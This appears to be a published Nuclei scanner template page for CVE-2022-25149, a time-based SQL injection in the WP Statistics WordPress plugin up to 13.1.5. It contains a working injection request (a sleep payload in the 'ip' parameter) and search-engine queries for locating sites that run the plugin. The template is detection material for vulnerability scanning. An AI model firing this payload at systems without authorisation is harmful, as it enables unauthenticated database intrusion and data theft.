WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection
ID: CVE-2022-25149
Severity: high
Author: theamanrawat
Tags: time-based-sqli,cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs
Description
Section titled “Description”The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the IP parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.
YAML Source
Section titled “YAML Source”id: CVE-2022-25149
info: name: WordPress Plugin WP Statistics <= 13.1.5 - SQL Injection author: theamanrawat severity: high description: | The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the IP parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5. reference: - https://wordpress.org/plugins/wp-statistics/ - https://gist.github.com/Xib3rR4dAr/5dbd58b7f57a5037fe461fba8e696042 - https://nvd.nist.gov/vuln/detail/CVE-2022-25149 - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2679983%40wp-statistics&new=2679983%40wp-statistics&sfp_email=&sfph_mail= - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-25149 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-25149 cwe-id: CWE-89 epss-score: 0.26955 epss-percentile: 0.96764 cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: veronalabs product: wp_statistics framework: wordpress shodan-query: http.html:/wp-content/plugins/wp-statistics/ fofa-query: body=/wp-content/plugins/wp-statistics/ publicwww-query: "/wp-content/plugins/wp-statistics/" google-query: inurl:/wp-content/plugins/wp-statistics tags: time-based-sqli,cve2022,cve,sqli,wpscan,wordpress,wp-plugin,wp,wp-statistics,veronalabs
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | @timeout: 50s GET /wp-json/wp-statistics/v2/hit?_=11&_wpnonce={{nonce}}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip='-sleep(6)-'&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id=0&search_query&page_uri=/&user_id=0 HTTP/1.1 Host: {{Hostname}}
host-redirects: true matchers: - type: dsl dsl: - duration>=6 - status_code == 200 - contains(header, "application/json") - contains(body, 'Visitor Hit was recorded successfully') condition: and
extractors: - type: regex name: nonce group: 1 regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true# digest: 4a0a00473045022100de596b1f1a24ae80506862295dfc722b9b690657f27a1ad67f5c3da010e65ac3022036d683a98804e63bb69709b45caf203e35363963ac7887935859787ecb9c6e89:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-25149.yaml"